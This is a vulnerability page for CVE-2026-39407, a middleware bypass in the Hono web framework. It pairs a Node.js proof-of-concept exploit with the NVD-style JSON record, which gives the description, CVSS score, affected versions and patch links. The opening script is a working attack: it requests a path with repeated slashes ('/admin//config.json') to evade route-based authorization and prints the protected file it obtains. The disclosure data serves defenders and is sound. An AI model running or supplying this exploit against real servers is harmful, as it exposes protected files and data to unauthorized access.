CVE-2026-39407

// PoC for CVE-2026-39407: Hono Middleware Bypass // Description: Bypass route-based middleware by using repeated slashes. const fetch = require('node-fetch'); async function exploit() { const target = 'http://localhost:3000'; // Normal protected path that requires authentication/middleware check const protectedPath = '/admin/config.json'; // Malicious path with repeated slashes // The router might skip middleware matching, but serveStatic resolves it const bypassPath = '/admin//config.json'; console.log(`[+] Attempting to bypass middleware for: ${bypassPath}`); try { const response = await fetch(target + bypassPath); if (response.ok) { const data = await response.text(); console.log('[+] Exploit successful! Leaked data:'); console.log(data); } else { console.log('[-] Exploit failed.'); } } catch (error) { console.error('Error:', error); } } exploit();

{"cve": {"id": "CVE-2026-39407", "sourceIdentifier": "[email protected]", "published": "2026-04-08T15:16:14.667", "lastModified": "2026-04-21T18:36:36.133", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.12.12, a path handling inconsistency in serveStatic allows protected static files to be accessed by using repeated slashes (//) in the request path. When route-based middleware (e.g., /admin/*) is used for authorization, the router may not match paths containing repeated slashes, while serveStatic resolves them as normalized paths. This can lead to a middleware bypass. This vulnerability is fixed in 4.12.12."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hono:hono:*:*:*:*:*:node.js:*:*", "versionEndIncluding": "4.12.11", "matchCriteriaId": "295EEF12-243F-4561-B181-C19451B5285C"}]}]}], "references": [{"url": "https://github.com/honojs/hono/commit/9aff14bd727f8b0435c963363fd803260e7b8e3c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/honojs/hono/releases/tag/v4.12.12", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/honojs/hono/security/advisories/GHSA-wmmm-f939-6g9c", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}